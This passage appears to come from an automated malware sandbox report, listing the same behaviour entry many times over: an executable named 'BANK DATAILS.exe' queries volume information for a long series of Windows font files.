                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DATAILS.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
